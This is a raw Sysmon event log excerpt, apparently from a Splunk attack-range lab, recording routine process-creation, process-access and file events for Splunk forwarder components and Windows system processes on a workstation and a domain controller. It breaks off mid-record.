l+51791 10341000x800000000000000044298Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-1847-629A-1B07-000000006002}1188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044297Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1847-629A-1B07-000000006002}1188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044296Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.827{0A5DF930-1847-629A-1B07-000000006002}1188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044295Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:47.826{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD3EB9BFF0FD89AF6F6079DE7CD0C9BD,SHA256=F4B5562A7A7FA3A49BCD237172858903748C9D290E2C0154A081B9A1369DEF90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:47.939{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B6BE10D63D1B4B8746839E5C9B15C11,SHA256=4FE3A19A826FE5BD2871D0706EC7E202C6A25D829DF8008855586F987F4AA4C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:47.876{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=DEBD29A9C787C1EEB1393D743E618C00,SHA256=00E259078762E7E50490369EFFB4E6A4EC95BA6096B706D8BA3D646021B53E0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044323Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.888{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69D72CA4069BC9A669FEAC885EB43C06,SHA256=633165CE006F746B20CFEE38095B4F5B1804BA892941993B3E99885ECF521C21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:48.905{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EFF1965B24D3DFEB4E826BEE505B8F4,SHA256=D1314589F7922E0873D5293E04285BB78CA8FBDACFE81F60719025DF73BE6D79,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044322Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.654{0A5DF930-1848-629A-1C07-000000006002}856604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044321Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1848-629A-1C07-000000006002}856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044320Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044319Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044318Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044317Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044316Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044315Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044314Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044313Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044312Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044311Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-E35B-6299-0500-000000006002}412528C:\Windows\system32\csrss.exe{0A5DF930-1848-629A-1C07-000000006002}856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044310Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1848-629A-1C07-000000006002}856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044309Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:48.498{0A5DF930-1848-629A-1C07-000000006002}856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:49.938{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD70AFF1C5DE85CD74E7A250BB78F45C,SHA256=2F1A9944DF485C66DB9404957A9FDA32E939901C2C7EE002A7A51C4943CCFBEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044337Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.388{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FDEB1EA4CFB6F6D729A7550FB779DA6,SHA256=A93B82A14B4ABE3484757A8E9DB162F07E0D1949DF4A52DDE9C4CA8AEF2841F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044336Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.170{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1849-629A-1D07-000000006002}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044335Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.170{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044334Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.170{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044333Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.170{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044332Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.170{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044331Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:49.170{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044330Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 